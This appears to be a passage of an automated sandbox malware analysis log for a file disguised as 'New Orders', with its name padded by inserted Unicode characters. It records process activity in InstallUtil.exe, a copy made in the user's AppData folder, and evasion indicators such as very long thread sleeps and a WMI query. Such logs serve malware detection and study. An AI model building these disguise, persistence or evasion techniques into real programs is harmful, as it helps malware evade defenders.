                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeMemory allocated: 2AD237C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeMemory allocated: 2AD3D040000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2E20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2FA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4FA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeMemory allocated: 1070000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeMemory allocated: 2AB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeMemory allocated: 4AB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeMemory allocated: C60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeMemory allocated: 2720000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeMemory allocated: 4720000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1199940Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1199812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1199703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1199590Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1199481Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1199343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1199218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1199106Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1198999Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1198890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1198767Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1198640Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1198531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1198418Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1198312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1198203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1198093Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1197968Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1197815Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1197672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1197562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1197453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1197329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1197179Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1197062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1196946Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1196843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1196734Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\YZbrmyt\YZbrmyt.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeWindow / User API: threadDelayed 3856Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeWindow / User API: threadDelayed 900Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4960Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4872Jump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe TID: 7428Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe TID: 7428Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe TID: 7428Thread sleep time: -99875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe TID: 7428Thread sleep time: -99763s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe TID: 7428Thread sleep time: -99655s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe TID: 7428Thread sleep time: -99545s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe TID: 7428Thread sleep time: -99418s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe TID: 7428Thread sleep time: -99312s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe TID: 7428Thread sleep time: -99203s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe TID: 7428Thread sleep time: -99087s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe TID: 7428Thread sleep time: -98953s >= -30000sJump to behavior
